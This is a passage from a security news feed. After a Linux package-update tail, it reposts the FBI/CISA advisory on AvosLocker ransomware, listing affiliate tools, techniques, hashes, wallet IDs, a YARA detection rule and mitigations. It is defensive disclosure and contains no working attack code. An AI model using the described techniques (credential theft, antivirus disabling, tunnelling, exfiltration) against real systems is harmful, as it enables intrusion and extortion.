                    lib32-libnghttp2             1.57.0-1             1.58.0-1
                     lib32-libsodium             1.0.18-2             1.0.19-1
      lib32-vulkan-validation-layers          1.3.261.1-1          1.3.268.0-1
                           wine-nine                0.8-4                0.9-1

</code></pre>
<p><a href="https://forum.manjaro.org/t/testing-update-2023-10-30-kernel-6-6-linux-firmware-kde-git-python/150580/1">Click to view the poll.</a></p>
<p>Check if your mirror has already synced:</p>
<ul>
<li><a href="https://repo.manjaro.org/">Mirror-Check Service</a></li>
</ul>
            <p><small>2 posts - 1 participant</small></p>
            <p><a href="https://forum.manjaro.org/t/testing-update-2023-10-30-kernel-6-6-linux-firmware-kde-git-python/150580">Read full topic</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[#StopRansomware: AvosLocker Ransomware (Update)]]></title>
<description><![CDATA[SUMMARY
Note: This joint Cybersecurity Advisory (CSA) is part of an ongoing #StopRansomware effort to publish advisories for network defenders that detail various ransomware variants and ransomware threat actors. These #StopRansomware advisories include recently and historically observed tactics,...]]></description>
<link>https://tsecurity.de/de/1899022/sicherheitsluecken/stopransomware-avoslocker-ransomware-update/</link>
<guid isPermaLink="true">https://tsecurity.de/de/1899022/sicherheitsluecken/stopransomware-avoslocker-ransomware-update/</guid>
<pubDate>Fri, 20 Oct 2023 19:47:40 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h3><strong>SUMMARY</strong></h3>
<p><strong><em>Note:</em></strong><em> This joint Cybersecurity Advisory (CSA) is part of an ongoing #StopRansomware effort to publish advisories for network defenders that detail various ransomware variants and ransomware threat actors. These #StopRansomware advisories include recently and historically observed tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) to help organizations protect against ransomware. Visit </em><a href="https://www.cisa.gov/stopransomware" title="#StopRansomware"><em>stopransomware.gov</em></a><em> to see all #StopRansomware advisories and to learn more about other ransomware threats and no-cost resources.</em></p>
<p>The Federal Bureau of Investigation (FBI) and the Cybersecurity and Infrastructure Security Agency (CISA) are releasing this joint Cybersecurity Advisory (CSA) to disseminate known IOCs, TTPs, and detection methods associated with the AvosLocker variant identified through FBI investigations as recently as May 2023. AvosLocker operates under a ransomware-as-a-service (RaaS) model. AvosLocker affiliates have compromised organizations across multiple critical infrastructure sectors in the United States, affecting Windows, Linux, and VMware ESXi environments. AvosLocker affiliates compromise organizations’ networks by using legitimate software and open-source remote system administration tools. AvosLocker affiliates then use exfiltration-based data extortion tactics with threats of leaking and/or publishing stolen data.</p>
<p>This joint CSA updates the March 17, 2022, AvosLocker ransomware joint CSA, <a href="https://www.ic3.gov/Media/News/2022/220318.pdf" title="Indicators of Compromise Associated with AvosLocker Ransomware">Indicators of Compromise Associated with AvosLocker ransomware</a>, released by FBI and the Department of the Treasury’s Financial Crimes Enforcement Network (FinCEN). This update includes IOCs and TTPs not included in the previous advisory and a YARA rule FBI developed after analyzing a tool associated with an AvosLocker compromise.</p>
<p>FBI and CISA encourage critical infrastructure organizations to implement the recommendations in the Mitigations section of this CSA to reduce the likelihood and impact of AvosLocker ransomware and other ransomware incidents.</p>
<p>Download the PDF version of this report:</p>





<div class="c-file">
    <div class="c-file__download">
    <a href="https://www.cisa.gov/sites/default/files/2023-10/aa23-284a-joint-csa-stopransomware-avoslocker-ransomware-update.pdf" class="c-file__link" target="_blank">AA23-284A #StopRansomware: AvosLocker Ransomware (Update)</a>
    <span class="c-file__size">(PDF,       528.00 KB
  )</span>
  </div>
</div>
<p>For a downloadable copy of IOCs, see:</p>





<div class="c-file">
    <div class="c-file__download">
    <a href="https://www.cisa.gov/sites/default/files/2023-10/AA23-284A.stix_.xml" class="c-file__link" target="_blank">AA23-284A STIX XML</a>
    <span class="c-file__size">(XML,       46.67 KB
  )</span>
  </div>
</div>





<div class="c-file">
    <div class="c-file__download">
    <a href="https://www.cisa.gov/sites/default/files/2023-10/AA23-284A%20StopRansomware%20AvosLocker%20Ransomware%20Update.stix_.json" class="c-file__link" target="_blank">AA23-284A STIX JSON</a>
    <span class="c-file__size">(JSON,       34.50 KB
  )</span>
  </div>
</div>
<h3><strong>TECHNICAL DETAILS</strong></h3>
<p><strong><em>Note:</em></strong><em> This advisory uses the </em><a href="https://attack.mitre.org/versions/v13/matrices/enterprise/" title="Enterprise Matrix"><em>MITRE ATT&amp;CK for Enterprise</em></a><em> framework, version </em><em>13. See the MITRE ATT&amp;CK Tactics and Techniques section for a table of the threat actors’ activity mapped to MITRE ATT&amp;CK<sup>®</sup> tactics and techniques. For assistance with mapping malicious cyber activity to the MITRE ATT&amp;CK framework, see CISA and MITRE ATT&amp;CK’s </em><a href="https://www.cisa.gov/news-events/news/best-practices-mitre-attckr-mapping" title="Best Practices for MITRE ATT&amp;CK® Mapping"><em>Best Practices for MITRE ATT&amp;CK Mapping</em></a><em> and CISA’s </em><a href="https://github.com/cisagov/Decider/" title="cisagov / decider"><em>Decider Tool</em></a><em>.</em></p>
<p>AvosLocker affiliates use legitimate software and open-source tools during ransomware operations, which include exfiltration-based data extortion. Specifically, affiliates use:</p>
<ul><li>Remote system administration tools—Splashtop Streamer, Tactical RMM, PuTTy, AnyDesk, PDQ Deploy, and Atera Agent—as backdoor access vectors [<a href="https://attack.mitre.org/versions/v13/techniques/T1133/" title="External Remote Services">T1133</a>].</li>
<li>Scripts to execute legitimate native Windows tools [<a href="https://attack.mitre.org/versions/v13/techniques/T1047/" title="Windows Management Instrumentation">T1047</a>], such as PsExec and Nltest.</li>
<li>Open-source networking tunneling tools [<a href="https://attack.mitre.org/versions/v13/techniques/T1572/" title="Protocol Tunneling">T1572</a>] Ligolo[<a href="https://github.com/sysdream/ligolo" title="sysdream / ligolo">1</a>] and Chisel[<a href="https://github.com/jpillora/chisel" title="jpillora / chisel">2</a>].</li>
<li><a href="https://attack.mitre.org/versions/v13/software/S0154/" title="Cobalt Strike">Cobalt Strike</a> and Sliver[<a href="https://github.com/BishopFox/sliver/tree/6c02971b54831884d30407b632a379947dd289ad" title="BishopFox / sliver">3</a>] for command and control (C2).</li>
<li>Lazagne and Mimikatz for harvesting credentials [<a href="https://attack.mitre.org/techniques/T1555/" title="Credentials from Password Stores">T1555</a>].</li>
<li>FileZilla and Rclone for data exfiltration.</li>
<li>Notepad++, RDP Scanner, and 7zip.</li>
</ul><p>FBI has also observed AvosLocker affiliates:</p>
<ol><li>Use custom PowerShell [<a href="https://attack.mitre.org/versions/v13/techniques/T1059/001/" title="Command and Scripting Interpreter: PowerShell">T1059.001</a>] and batch (<code>.bat</code>) scripts [<a href="https://attack.mitre.org/versions/v13/techniques/T1059/003/" title="Command and Scripting Interpreter: Windows Command Shell">T1059.003</a>] for lateral movement, privilege escalation, and disabling antivirus software.</li>
<li>Upload and use custom webshells to enable network access [<a href="https://attack.mitre.org/versions/v13/techniques/T1505/003/" title="Server Software Component: Web Shell">T1505.003</a>].</li>
</ol><p>For additional TTPs, see joint CSA <a href="https://www.ic3.gov/Media/News/2022/220318.pdf" title="Indicators of Compromise Associated with AvosLocker Ransomware">Indicators of Compromise Associated with AvosLocker Ransomware</a><em>.</em></p>
<h4><strong>Indicators of Compromise (IOCs)</strong></h4>
<p>See Tables 1 and 2 below for IOCs obtained from January 2023–May 2023.</p>
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap=""><caption><em>Table 1: Files, Tools, and Hashes as of May 2023</em></caption>
<thead><tr><td>
<p><strong>Files and Tools</strong></p>
</td>
<td>
<p><strong>MD5</strong></p>
</td>
</tr></thead><tbody><tr><td>
<p>psscriptpolicytest_im2hdxqi.g0k.ps1</p>
</td>
<td>
<p>829f2233a1cd77e9ec7de98596cd8165</p>
</td>
</tr><tr><td>
<p>psscriptpolicytest_lysyd03n.o10.ps1</p>
</td>
<td>
<p>6ebd7d7473f0ace3f52c483389cab93f</p>
</td>
</tr><tr><td>
<p>psscriptpolicytest_1bokrh3l.2nw.ps1</p>
</td>
<td>
<p>10ef090d2f4c8001faadb0a833d60089</p>
</td>
</tr><tr><td>
<p>psscriptpolicytest_nvuxllhd.fs4.ps1</p>
</td>
<td>
<p>8227af68552198a2d42de51cded2ce60</p>
</td>
</tr><tr><td>
<p>psscriptpolicytest_2by2p21u.4ej.ps1</p>
</td>
<td>
<p>9d0b3796d1d174080cdfdbd4064bea3a</p>
</td>
</tr><tr><td>
<p>psscriptpolicytest_te5sbsfv.new.ps1</p>
</td>
<td>
<p>af31b5a572b3208f81dbf42f6c143f99</p>
</td>
</tr><tr><td>
<p>psscriptpolicytest_v3etgbxw.bmm.ps1</p>
</td>
<td>
<p>1892bd45671f17e9f7f63d3ed15e348e</p>
</td>
</tr><tr><td>
<p>psscriptpolicytest_fqa24ixq.dtc.ps1</p>
</td>
<td>
<p>cc68eaf36cb90c08308ad0ca3abc17c1</p>
</td>
</tr><tr><td>
<p>psscriptpolicytest_jzjombgn.sol.ps1</p>
</td>
<td>
<p>646dc0b7335cffb671ae3dfd1ebefe47</p>
</td>
</tr><tr><td>
<p>psscriptpolicytest_rdm5qyy1.phg.ps1</p>
</td>
<td>
<p>609a925fd253e82c80262bad31637f19</p>
</td>
</tr><tr><td>
<p>psscriptpolicytest_endvm2zz.qlp.ps1</p>
</td>
<td>
<p>c6a667619fff6cf44f447868d8edd681</p>
</td>
</tr><tr><td>
<p>psscriptpolicytest_s1mgcgdk.25n.ps1</p>
</td>
<td>
<p>3222c60b10e5a7c3158fd1cb3f513640</p>
</td>
</tr><tr><td>
<p>psscriptpolicytest_xnjvzu5o.fta.ps1</p>
</td>
<td>
<p>90ce10d9aca909a8d2524bc265ef2fa4</p>
</td>
</tr><tr><td>
<p>psscriptpolicytest_satzbifj.oli.ps1</p>
</td>
<td>
<p>44a3561fb9e877a2841de36a3698abc0</p>
</td>
</tr><tr><td>
<p>psscriptpolicytest_grjck50v.nyg.ps1</p>
</td>
<td>
<p>5cb3f10db11e1795c49ec6273c52b5f1</p>
</td>
</tr><tr><td>
<p>psscriptpolicytest_0bybivfe.x1t.ps1</p>
</td>
<td>
<p>122ea6581a36f14ab5ab65475370107e</p>
</td>
</tr><tr><td>
<p>psscriptpolicytest_bzoicrns.kat.ps1</p>
</td>
<td>
<p>c82d7be7afdc9f3a0e474f019fb7b0f7</p>
</td>
</tr></tbody><thead><tr><td>
<p><strong>Files and Tools</strong></p>
</td>
<td>
<p><strong>SHA256</strong></p>
</td>
</tr></thead><tbody><tr><td>
<p>BEACON.PS1</p>
</td>
<td>
<p>e68f9c3314beee640cc32f08a8532aa8dcda613543c54a83680c21d7cd49ca0f</p>
</td>
</tr><tr><td>
<p>Encoded PowerShell script</p>
</td>
<td>
<p>ad5fd10aa2dc82731f3885553763dfd4548651ef3e28c69f77ad035166d63db7  </p>
</td>
</tr><tr><td>
<p>Encoded PowerShell script</p>
</td>
<td>
<p>48dd7d519dbb67b7a2bb2747729fc46e5832c30cafe15f76c1dbe3a249e5e731  </p>
</td>
</tr></tbody><thead><tr><td>
<p><strong>Files and Tools</strong></p>
</td>
<td>
<p><strong>SHA1</strong></p>
</td>
</tr></thead><tbody><tr><td>
<p>PowerShell backdoor</p>
</td>
<td>
<p>2d1ce0231cf8ff967c36bbfc931f3807ddba765c</p>
</td>
</tr></tbody></table><table class="MsoTableGrid tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap=""><caption><em>Table 2: Email Address and Virtual Currency Wallets</em></caption>
<thead><tr><th scope="col" role="columnheader" data-tablesaw-priority="persist">
<p><em><strong>Email Address</strong></em></p>
</th>
</tr></thead><tbody><tr><td>
<p><em>keishagrey994@outlook[.]com</em></p>
</td>
</tr></tbody><thead><tr><th scope="col" role="columnheader">
<p><em><strong>Virtual Currency Wallets</strong></em></p>
</th>
</tr></thead><tbody><tr><td>
<p><em>a6dedd35ad745641c52d6a9f8da1fb09101d152f01b4b0e85a64d21c2a0845ee</em></p>
</td>
</tr><tr><td>
<p><em>bfacebcafff00b94ad2bff96b718a416c353a4ae223aa47d4202cdbc31e09c92</em></p>
</td>
</tr><tr><td>
<p><em>418748c1862627cf91e829c64df9440d19f67f8a7628471d4b3a6cc5696944dd</em></p>
</td>
</tr><tr><td>
<p><em>bc1qn0u8un00nl6uz6uqrw7p50rg86gjrx492jkwfn</em></p>
</td>
</tr></tbody></table><h3><strong>DETECTION</strong></h3>
<p>Based on an investigation by an advanced digital forensics group, FBI created the following YARA rule to detect the signature for a file identified as enabling malware. <code>NetMonitor.exe</code> is a malware masquerading as a legitimate process and has the appearance of a legitimate network monitoring tool. This persistence tool sends pings from the network every five minutes. The NetMonitor executable is configured to use an IP address as its command server, and the program communicates with the server over port 443. During the attack, traffic between NetMonitor and the command server is encrypted, where NetMonitor functions like a reverse proxy and allows actors to connect to the tool from outside the victim’s network.</p>
<h4>YARA Rule</h4>
<table><tbody><tr><td><code>rule NetMonitor <br>
			{<br>
			  meta:<br>
			    author = "FBI"<br>
			    source = "FBI"<br>
			    sharing = "TLP:CLEAR"<br>
			    status = "RELEASED"<br>
			    description = "Yara rule to detect NetMonitor.exe"<br>
			    category = "MALWARE"<br>
			    creation_date = "2023-05-05"<br>
			  strings:<br>
			    $rc4key = {11 4b 8c dd 65 74 22 c3}<br>
			    $op0 = {c6 [3] 00 00 05 c6 [3] 00 00 07 83 [3] 00 00 05 0f 85 [4] 83 [3] 00 00 01 75 ?? 8b [2] 4c 8d [2] 4c 8d [3] 00 00 48 8d [3] 00 00 48 8d [3] 00 00 48 89 [3] 48 89 ?? e8}<br>
			  condition:<br>
			    uint16(0) == 0x5A4D<br>
			    and filesize 
			    and any of them<br>
			}</code></td>
</tr></tbody></table><h3><strong>MITRE ATT&amp;CK TACTICS AND TECHNIQUES</strong></h3>
<p>See Tables 3-7 for all referenced threat actor tactics and techniques in this advisory.</p>
<table class="Table tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap=""><caption><em>Table 3: AvosLocker Affiliates ATT&amp;CK Techniques for Initial Access</em></caption>
<thead><tr><th scope="col" role="columnheader" data-tablesaw-priority="persist">
<p><strong>Initial Access </strong></p>
</th>
<th scope="col" role="columnheader"> </th>
<th scope="col" role="columnheader"> </th>
</tr></thead><tbody><tr><td>
<p><strong>Technique Title</strong></p>
</td>
<td>
<p><strong>ID</strong></p>
</td>
<td>
<p><strong>Use</strong></p>
</td>
</tr><tr><td>
<p>External Remote Services</p>
</td>
<td>
<p><a href="https://attack.mitre.org/versions/v13/techniques/T1133/" title="External Remote Services">T1133</a></p>
</td>
<td>
<p>AvosLocker affiliates use remote system administration tools—Splashtop Streamer, Tactical RMM, PuTTy, AnyDesk, PDQ Deploy, and Atera Agent—to access backdoor access vectors.</p>
</td>
</tr></tbody></table><table class="Table tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap=""><caption><em>Table 4: AvosLocker Affiliates ATT&amp;CK Techniques for Execution</em></caption>
<thead><tr><th scope="col" role="columnheader" data-tablesaw-priority="persist"><strong>Execution</strong></th>
<th scope="col" role="columnheader"> </th>
<th scope="col" role="columnheader"> </th>
</tr></thead><tbody><tr><td>
<p><strong>Technique Title</strong></p>
</td>
<td>
<p><strong>ID</strong></p>
</td>
<td>
<p><strong>Use</strong></p>
</td>
</tr><tr><td>
<p>Command and Scripting Interpreter: PowerShell</p>
</td>
<td>
<p><a href="https://attack.mitre.org/versions/v13/techniques/T1059/001/" title="Command and Scripting Interpreter: PowerShell">T1059.001</a></p>
</td>
<td>
<p>AvosLocker affiliates use custom PowerShell scripts to enable privilege escalation, lateral movement, and to disable antivirus.</p>
</td>
</tr><tr><td>
<p>Command and Scripting Interpreter: Windows Command Shell</p>
</td>
<td>
<p><a href="https://attack.mitre.org/versions/v13/techniques/T1059/003/" title="Command and Scripting Interpreter: Windows Command Shell">T1059.003</a></p>
</td>
<td>
<p>AvosLocker affiliates use custom <code>.bat</code> scripts to enable privilege escalation, lateral movement, and to disable antivirus. </p>
</td>
</tr><tr><td>
<p>Windows Management Instrumentation</p>
</td>
<td>
<p><a href="https://attack.mitre.org/versions/v13/techniques/T1047/" title="Windows Management Instrumentation">T1047</a></p>
</td>
<td>
<p>AvosLocker affiliates use legitimate Windows tools, such as PsExec and Nltest in their execution.</p>
</td>
</tr></tbody></table><table class="Table tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap=""><caption><em>Table 5: AvosLocker Affiliates ATT&amp;CK Techniques for Persistence</em></caption>
<thead><tr><th scope="col" role="columnheader" data-tablesaw-priority="persist">
<p><strong>Persistence</strong></p>
</th>
<th scope="col" role="columnheader"> </th>
<th scope="col" role="columnheader"> </th>
</tr></thead><tbody><tr><td>
<p><strong>Technique Title</strong></p>
</td>
<td>
<p><strong>ID</strong></p>
</td>
<td>
<p><strong>Use</strong></p>
</td>
</tr><tr><td>
<p>Server Software Component</p>
</td>
<td>
<p><a href="https://attack.mitre.org/versions/v13/techniques/T1505/003/" title="Server Software Component">T1505.003</a></p>
</td>
<td>
<p>AvosLocker affiliates have uploaded and used custom webshells to enable network access.</p>
</td>
</tr></tbody></table><table class="Table tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap=""><caption><em>Table 6: AvosLocker Affiliates ATT&amp;CK Techniques for Credential Access</em></caption>
<thead><tr><th scope="col" role="columnheader" data-tablesaw-priority="persist">
<p><strong>Credential Access</strong></p>
</th>
<th scope="col" role="columnheader"> </th>
<th scope="col" role="columnheader"> </th>
</tr></thead><tbody><tr><td>
<p><strong>Technique Title</strong></p>
</td>
<td>
<p><strong>ID</strong></p>
</td>
<td>
<p><strong>Use</strong></p>
</td>
</tr><tr><td>
<p>Credentials from Password Stores</p>
</td>
<td>
<p><a href="https://attack.mitre.org/techniques/T1555/" title="Credentials from Password Stores">T1555</a></p>
</td>
<td>
<p>AvosLocker affiliates use open-source applications Lazagne and Mimikatz to steal credentials from system stores.</p>
</td>
</tr></tbody></table><table class="Table tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap=""><caption><em>Table 7: AvosLocker Affiliates ATT&amp;CK Techniques for Command and Control</em></caption>
<thead><tr><th scope="col" role="columnheader" data-tablesaw-priority="persist">
<p><strong>Command and Control </strong></p>
</th>
<th scope="col" role="columnheader"> </th>
<th scope="col" role="columnheader"> </th>
</tr></thead><tbody><tr><td>
<p><strong>Technique Title</strong></p>
</td>
<td>
<p><strong>ID</strong></p>
</td>
<td>
<p><strong>Use</strong></p>
</td>
</tr><tr><td>
<p>Protocol Tunneling</p>
</td>
<td>
<p><a href="https://attack.mitre.org/versions/v13/techniques/T1572/" title="Protocol Tunneling">T1572</a></p>
</td>
<td>
<p>AvosLocker affiliates use open source networking tunneling tools like Ligolo and Chisel.</p>
</td>
</tr></tbody></table><h3><strong>MITIGATIONS</strong></h3>
<p>These mitigations apply to all critical infrastructure organizations and network defenders. The FBI and CISA recommend that software manufactures incorporate secure-by-design and -default principles and tactics into their software development practices to limit the impact of ransomware techniques (such as threat actors leveraging backdoor vulnerabilities into remote software systems), thus, strengthening the secure posture for their customers.</p>
<p>For more information on secure by design, see CISA’s <a href="https://www.cisa.gov/securebydesign" title="Secure by Design">Secure by Design and Default</a> webpage and <a href="https://www.cisa.gov/resources-tools/resources/secure-by-design-and-default" title="Security-by-Design and -Default">joint guide</a>.</p>
<p>FBI and CISA recommend organizations implement the mitigations below to improve your cybersecurity posture on the basis of the threat actor activity and to reduce the risk of compromise by AvosLocker ransomware. These mitigations align with the Cross-Sector Cybersecurity Performance Goals (CPGs) developed by CISA and the National Institute of Standards and Technology (NIST). The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement. CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful threats, tactics, techniques, and procedures. Visit CISA’s <a href="https://www.cisa.gov/cross-sector-cybersecurity-performance-goals" target="_blank" title="Cross-Sector Cybersecurity Performance Goals">Cross-Sector Cybersecurity Performance Goals</a> for more information on the CPGs, including additional recommended baseline protections.</p>
<ul><li>Secure remote access tools by:
<ul><li><strong>Implementing</strong><strong> application controls</strong> to manage and control execution of software, including allowlisting remote access programs. Application controls should prevent installation and execution of portable versions of unauthorized remote access and other software. A properly configured application allowlisting solution will block any unlisted application execution. Allowlisting is important because antivirus solutions may fail to detect the execution of malicious portable executables when the files use any combination of compression, encryption, or obfuscation.</li>
<li>Applying recommendations in CISA's joint <a href="https://www.cisa.gov/sites/default/files/2023-06/Guide%20to%20Securing%20Remote%20Access%20Software_clean%20Final_508c.pdf" title="GUIDE TO SECURING REMOTE ACCESS SOFTWARE">Guide to Securing Remote Access Software</a>.</li>
</ul></li>
<li><strong>Strictly limit the use of RDP and other remote desktop services</strong>. If RDP is necessary, rigorously apply best practices, for example [<a href="https://www.cisa.gov/sites/default/files/2023-03/CISA_CPG_REPORT_v1.0.1_FINAL.pdf" title="Cross-Sector Cybersecurity Performance Goals March 2023 Update">CPG 2.W</a>]:
<ul><li>Audit the network for systems using RDP.</li>
<li>Close unused RDP ports.</li>
<li>Enforce account lockouts after a specified number of attempts.</li>
<li>Apply <a href="https://www.cisa.gov/sites/default/files/publications/fact-sheet-implementing-phishing-resistant-mfa-508c.pdf" title="Implementing Phishing-Resistant MFA">phishing-resistant multifactor authentication (MFA)</a>.</li>
<li>Log RDP login attempts.</li>
</ul></li>
<li><strong>Disable command-line and scripting activities and permissions </strong>[<a href="https://www.cisa.gov/sites/default/files/2023-03/CISA_CPG_REPORT_v1.0.1_FINAL.pdf" title="Cross-Sector Cybersecurity Performance Goals March 2023 Update">CPG 2.N</a>]<strong>.</strong></li>
<li><strong>Restrict the use of PowerShell</strong>, using Group Policy, and only grant access to specific users on a case-by-case basis. Typically, only those users or administrators who manage the network or Windows operating systems (OSs) should be permitted to use PowerShell [<a href="https://www.cisa.gov/sites/default/files/2023-03/CISA_CPG_REPORT_v1.0.1_FINAL.pdf" title="Cross-Sector Cybersecurity Performance Goals March 2023 Update">CPG 2.E</a>].</li>
<li><strong>Update Windows PowerShell or PowerShell Core</strong> to the latest version and uninstall all earlier PowerShell versions. Logs from Windows PowerShell prior to version 5.0 are either non-existent or do not record enough detail to aid in enterprise monitoring and incident response activities [<a href="https://www.cisa.gov/sites/default/files/2023-03/CISA_CPG_REPORT_v1.0.1_FINAL.pdf" title="Cross-Sector Cybersecurity Performance Goals March 2023 Update">CPG 1.E, 2.S, 2.T</a>].</li>
<li><strong>Enable enhanced PowerShell logging </strong>[<a href="https://www.cisa.gov/sites/default/files/2023-03/CISA_CPG_REPORT_v1.0.1_FINAL.pdf" title="Cross-Sector Cybersecurity Performance Goals March 2023 Update">CPG 2.T, 2.U</a>].
<ul><li>PowerShell logs contain valuable data, including historical OS and registry interaction and possible TTPs of a threat actor’s PowerShell use.</li>
<li>Ensure PowerShell instances, using the latest version, have module, script block, and transcription logging enabled (enhanced logging).</li>
<li>The two logs that record PowerShell activity are the PowerShell Windows Event Log and the PowerShell Operational Log. FBI and CISA recommend turning on these two Windows Event Logs with a retention period of at least 180 days. These logs should be checked on a regular basis to confirm whether the log data has been deleted or logging has been turned off. Set the storage size permitted for both logs to as large as possible.</li>
</ul></li>
</ul><p><strong>Configure the Windows Registry to require User Account Control (UAC) approval for any PsExec operations</strong> requiring administrator privileges to reduce the risk of lateral movement by PsExec.</p>
<p>In addition, FBI and CISA recommend network defenders apply the following mitigations to limit potential adversarial use of common system and network discovery techniques and to reduce the impact and risk of compromise by ransomware or data extortion actors:</p>
<ul><li><strong>Disable File and Printer sharing services. </strong>If these services are required, use strong passwords or Active Directory authentication.</li>
<li><strong>Implement a recovery plan</strong> to maintain and retain multiple copies of sensitive or proprietary data and servers in a physically separate, segmented, and secure location (e.g., hard drive, storage device, or the cloud).</li>
<li><strong>Maintain offline backups of data,</strong> and regularly maintain backup and restoration (daily or weekly at minimum). By instituting this practice, an organization minimizes the impact of disruption to business practices as they will not be as severe and/or only have irretrievable data [<a href="https://www.cisa.gov/sites/default/files/2023-03/CISA_CPG_REPORT_v1.0.1_FINAL.pdf" title="Cross-Sector Cybersecurity Performance Goals March 2023 Update">CPG 2.R</a>]. Recommend organizations follow the 3-2-1 backup strategy in which organizations have three copies of data (one copy of production data and two backup copies) on two different media such as disk and tape, with one copy kept off-site for disaster recovery.</li>
<li><strong>Require all accounts</strong> with password logins (e.g., service account, admin accounts, and domain admin accounts) <strong>to comply</strong> with <a href="https://pages.nist.gov/800-63-3/" title="Digital Identity Guidelines">NIST's standards</a> for developing and managing password policies.
<ul><li>Use longer passwords consisting of at least 15 characters [<a href="https://www.cisa.gov/sites/default/files/2023-03/CISA_CPG_REPORT_v1.0.1_FINAL.pdf" title="Cross-Sector Cybersecurity Performance Goals March 2023 Update">CPG 2.B</a>].</li>
<li>Store passwords in hashed format using industry-recognized password managers.</li>
<li>Add password user “salts” to shared login credentials.</li>
<li>Avoid reusing passwords [<a href="https://www.cisa.gov/sites/default/files/2023-03/CISA_CPG_REPORT_v1.0.1_FINAL.pdf" title="Cross-Sector Cybersecurity Performance Goals March 2023 Update">CPG 2.C</a>].</li>
<li>Implement multiple failed login attempt account lockouts [<a href="https://www.cisa.gov/sites/default/files/2023-03/CISA_CPG_REPORT_v1.0.1_FINAL.pdf" title="Cross-Sector Cybersecurity Performance Goals March 2023 Update">CPG 2.G</a>].</li>
<li>Disable password “hints.”</li>
<li>Refrain from requiring password changes more frequently than once per year.<br><strong>Note:</strong> NIST guidance suggests favoring longer passwords instead of requiring regular and frequent password resets. Frequent password resets are more likely to result in users developing password “patterns” cyber criminals can easily decipher.</li>
<li>Require administrator credentials to install software.</li>
</ul></li>
<li><strong>Require phishing-resistant multifactor authentication</strong> for all services to the extent possible, particularly for webmail, virtual private networks, and accounts that access critical systems [<a href="https://www.cisa.gov/sites/default/files/2023-03/CISA_CPG_REPORT_v1.0.1_FINAL.pdf" title="Cross-Sector Cybersecurity Performance Goals March 2023 Update">CPG 2.H</a>].</li>
<li><strong>Keep all operating systems, software, and firmware up to date.</strong> Timely patching is one of the most efficient and cost-effective steps an organization can take to minimize its exposure to cybersecurity threats. Organizations should patch vulnerable software and hardware systems within 24 to 48 hours of vulnerability disclosure. Prioritize patching <a href="https://www.cisa.gov/known-exploited-vulnerabilities-catalog" title="Known Exploited Vulnerabilities Catalog">known exploited vulnerabilities</a> in internet-facing systems [<a href="https://www.cisa.gov/sites/default/files/2023-03/CISA_CPG_REPORT_v1.0.1_FINAL.pdf" title="Cross-Sector Cybersecurity Performance Goals March 2023 Update">CPG 1.E</a>].</li>
<li><strong>Segment networks</strong> to prevent the spread of ransomware. Network segmentation can help prevent the spread of ransomware by controlling traffic flows between—and access to—various subnetworks, restricting further lateral movement [<a href="https://www.cisa.gov/sites/default/files/2023-03/CISA_CPG_REPORT_v1.0.1_FINAL.pdf" title="Cross-Sector Cybersecurity Performance Goals March 2023 Update">CPG 2.F</a>].</li>
<li><strong>Identify, detect, and investigate abnormal activity and potential traversal of the indicated ransomware with a networking monitoring tool.</strong> To aid in detecting ransomware, implement a tool that logs and reports all network traffic, including lateral movement activity on a network. Endpoint detection and response (EDR) tools are particularly useful for detecting lateral connections, as they have insight into common and uncommon network connections for each host [<a href="https://www.cisa.gov/sites/default/files/2023-03/CISA_CPG_REPORT_v1.0.1_FINAL.pdf" title="Cross-Sector Cybersecurity Performance Goals March 2023 Update">CPG 3.A</a>].</li>
<li><strong>Install, regularly update, and enable real time detection for antivirus software</strong> on all hosts.</li>
<li><strong>Disable unused</strong> <strong>ports </strong>[<a href="https://www.cisa.gov/sites/default/files/2023-03/CISA_CPG_REPORT_v1.0.1_FINAL.pdf" title="Cross-Sector Cybersecurity Performance Goals March 2023 Update">CPG 2.V</a>]<strong>.</strong></li>
<li><strong>Consider adding an email banner to emails</strong> received from outside your organization [<a href="https://www.cisa.gov/sites/default/files/2023-03/CISA_CPG_REPORT_v1.0.1_FINAL.pdf" title="Cross-Sector Cybersecurity Performance Goals March 2023 Update">CPG 2.M</a>].</li>
<li><strong>Ensure all backup data is encrypted, immutable</strong> (i.e., cannot be altered or deleted), and covers the entire organization’s data infrastructure [<a href="https://www.cisa.gov/sites/default/files/2023-03/CISA_CPG_REPORT_v1.0.1_FINAL.pdf" title="Cross-Sector Cybersecurity Performance Goals March 2023 Update">CPG 2.K, 2.L, 2.R</a>].</li>
</ul><h3><strong>VALIDATE SECURITY CONTROLS</strong></h3>
<p>In addition to applying mitigations, FBI and CISA recommend exercising, testing, and validating your organization's security program against the threat behaviors mapped to the MITRE ATT&amp;CK for Enterprise framework in this advisory. FBI and CISA recommend testing your existing security controls inventory to assess how they perform against the ATT&amp;CK techniques described in this advisory.</p>
<p>To get started:</p>
<ol><li>Select an ATT&amp;CK technique described in this advisory (see Tables 3-7).</li>
<li>Align your security technologies against the technique.</li>
<li>Test your technologies against the technique.</li>
<li>Analyze your detection and prevention technologies’ performance.</li>
<li>Repeat the process for all security technologies to obtain a set of comprehensive performance data.</li>
<li>Tune your security program, including people, processes, and technologies, based on the data generated by this process.</li>
</ol><p>FBI and CISA recommend continually testing your security program, at scale, in a production environment to ensure optimal performance against the MITRE ATT&amp;CK techniques identified in this advisory.</p>
<h3><strong>RESOURCES</strong></h3>
<ul><li><a href="https://www.stopransomware.gov/" title="#StopRansomware">Stopransomware.gov</a> is a whole-of-government approach that gives one central location for ransomware resources and alerts.</li>
<li>The <a href="https://www.cisa.gov/resources-tools/resources/stopransomware-guide" title="#StopRansomware Guide">Joint Ransomware Guide</a> provides preparation, prevention, and mitigation best practices as well as a ransomware response checklist.</li>
